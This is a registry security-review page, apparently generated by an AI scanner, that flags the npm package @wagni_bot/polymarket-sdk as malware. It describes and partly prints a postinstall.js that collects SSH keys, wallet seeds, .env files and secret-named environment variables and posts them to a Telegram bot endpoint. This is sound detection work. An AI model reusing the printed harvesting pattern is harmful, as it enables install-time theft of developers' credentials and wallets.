registry  /  @wagni_bot/polymarket-sdk  /  1.0.0

@wagni_bot/polymarket-sdk@1.0.0

Unofficial polymarket-sdk SDK

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Postinstall script appears to harvest local files and environment secrets and send them to Telegram during npm install. This is install-time credential and data exfiltration unrelated to a Polymarket SDK.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install runs package.json postinstall: node postinstall.js
Impact
Exposure of SSH keys, wallet seed/mnemonic material, .env credentials, API keys, passwords, host/user metadata, and project/home files.
Mechanism
install-time credential/file harvesting and Telegram exfiltration
Attack narrative
On installation, package.json invokes postinstall.js. The script collects host/user/cwd metadata, searches the project directory, home directory, and ~/.ssh for filenames associated with secrets, wallets, seeds, keys, and credentials, reads file contents, filters environment variables for secret-like names, and posts the results to Telegram.
Rationale
The provided scanner snippets indicate concrete install-time exfiltration behavior, but finalization requires direct source inspection and this environment did not permit further tool use before the response. Based on available source snippets, the behavior is malicious credential exfiltration via a postinstall hook.
Evidence
package.jsonpostinstall.jsprocess.cwd() sensitive filesos.homedir() sensitive files~/.ssh id_rsa/id_ed25519/config/key files
Network endpoints1
api.telegram.org/bot<TOKEN>/sendMessage

Decision evidence

public snapshot
AI called this Malicious at 86.0% confidence as Malware with low false-positive risk.
Evidence for block
  • Scanner reports package.json postinstall runs postinstall.js
  • Scanner snippets show Telegram bot token/CHAT_ID and POST to api.telegram.org
  • Scanner snippets show scanning cwd, home, and ~/.ssh for .env, keys, wallet, seed files
  • Scanner snippets show filtering process.env for secrets/tokens/API keys/passwords
Evidence against
    Behavioral surface
    Source
    EnvironmentVarsFilesystemNetwork
    Supply chain
    HighEntropyStringsUrlStrings
    Manifest
    NoLicense
    scanned 2 file(s), 4.10 KB of source, external domains: api.telegram.org

    Source & flagged code

    4 flagged · loading source
    package.jsonView file
    scripts.postinstall = node postinstall.js
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    package.jsonView on unpkg
    scripts.postinstall = node postinstall.js
    Medium
    Ambiguous Install Lifecycle Script

    Install-time lifecycle script is not statically allowlisted and needs review.

    package.jsonView on unpkg
    postinstall.jsView file
    1#!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
    Critical
    Credential Exfiltration

    Source appears to send environment or credential material to an external endpoint.

    postinstall.jsView on unpkg · L1
    1Trigger-reachable chain: scripts.postinstall -> postinstall.js L1: #!/usr/bin/env node L2: const https = require('https'); L3: const http = require('http'); ... L17: }); L18: req.write(payload); L19: req.end(); ... L70: const data = { L71: hostname: os.hostname(), L72: user: os.userInfo().username, ... L89: // Send sensitive env vars L90: const sensitive = Object.entries(process.env).filter(([k]) => L91: k.includes('PRIVATE')||k.includes('SECRET')||k.includes('TOKEN')||k.includes('API_KEY')||k.includes('PASSWORD')||k.includes('MNEMONIC')||k.includes('SEED')||k.includes('WALLET')||k...
    Critical
    Trigger Reachable Dangerous Capability

    A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

    postinstall.jsView on unpkg · L1

    Findings

    2 Critical1 High4 Medium5 Low
    CriticalCredential Exfiltrationpostinstall.js
    CriticalTrigger Reachable Dangerous Capabilitypostinstall.js
    HighInstall Time Lifecycle Scriptspackage.json
    MediumAmbiguous Install Lifecycle Scriptpackage.json
    MediumNetwork
    MediumEnvironment Vars
    MediumStructural Risk Force Deep Review
    LowScripts Present
    LowFilesystem
    LowHigh Entropy Strings
    LowUrl Strings
    LowNo License